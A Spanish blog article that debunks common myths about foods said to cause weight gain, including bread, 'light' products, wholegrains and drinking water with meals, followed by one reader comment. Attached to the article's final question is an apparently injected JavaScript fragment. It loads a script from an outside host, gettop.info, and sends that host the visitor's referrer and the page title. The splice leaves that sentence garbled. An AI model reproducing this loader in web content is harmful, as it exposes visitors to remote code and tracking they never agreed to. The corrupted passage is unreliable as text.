Salud y belleza » Dieta, Salud

Mitos sobre los alimentos que “engordan”

1 Comentario

Existen muchos mitos sobre la comida que engorda que son muy difíciles de erradicar, pese a que lo digan informes oficiales u organizaciones sanitarias. Sin embargo en este artículo intentaremos destaparte algunos mitos y te diremos cuáles no lo eran.

pan-no-engordaLa primera revelación es que el pan no engorda, solo tiene 4 calorías por gramo mientras que las grasas tienen 9. El problema en muchos casos no es el pan, sino la cantidad que se ingiere o el acompañante. Los médicos recomiendan comer pan, legumbres, pasta… porque nos aportan los hidratos de carbono que necesitamos.

Por otro lado, las “galletitas” que usamos para perder peso y para no picar suelen tener grasas hidrogenadas, por lo que son malas para la salud. Además, como sacian menos, se comen más, y en lugar de adelgazar, engordas.

alimentos-lightOtro de los secretos que vamos a destapar es que los alimentos que se denominan “lights”  no adelgazan. La misma cantidad que un producto que no es Light tiene menos calorías, pero como tienden a consumirse más porque se piensa que no engordan al final se acaba ganando más peso.

Por otro lado, los alimentos integrales aportan las mismas calorías que los que no lo son, por tanto, no adelgazan. Lo que ocurre es que aportan más fibra que los refinados por lo que ayuda al tránsito intestinal y a reducir glucosa y colesterol.

La combinación de alimentos también es un mito muy extendido, sobre todo en las dietas. Es falso que no se deban combinar en una comida hidratos de carbono con proteínas porque en realidad muchos alimentos son mezcla de esos ingredientes.

beber-aguaTampoco engorda beber agua cuando se está comiendo. No engorda en ningún momento y durante la comida puede ayudar a saciarnos antes incluso. Las frutas de postre tampoco engordan. El aceite y el agua tónica también engordan.

Esperamos haber desmentido alguno de los mitos que estaban más extendidos y que a partir de ahora sigan los consejos médicos y no los bulos o rumores.

¿Qué piensas de estos mitos? ¿Creías que eran ciertos?s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; }

Más consejos de salud y belleza : , ,

One Comment »

  • Demetrio said:

    La verdad es que los alimentos no engordan, engordas tú :) . Buen artículo, lo del pan y del agua era obvio, pero lo de los productos light no había caído… habrá que ser menos goloso :)

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.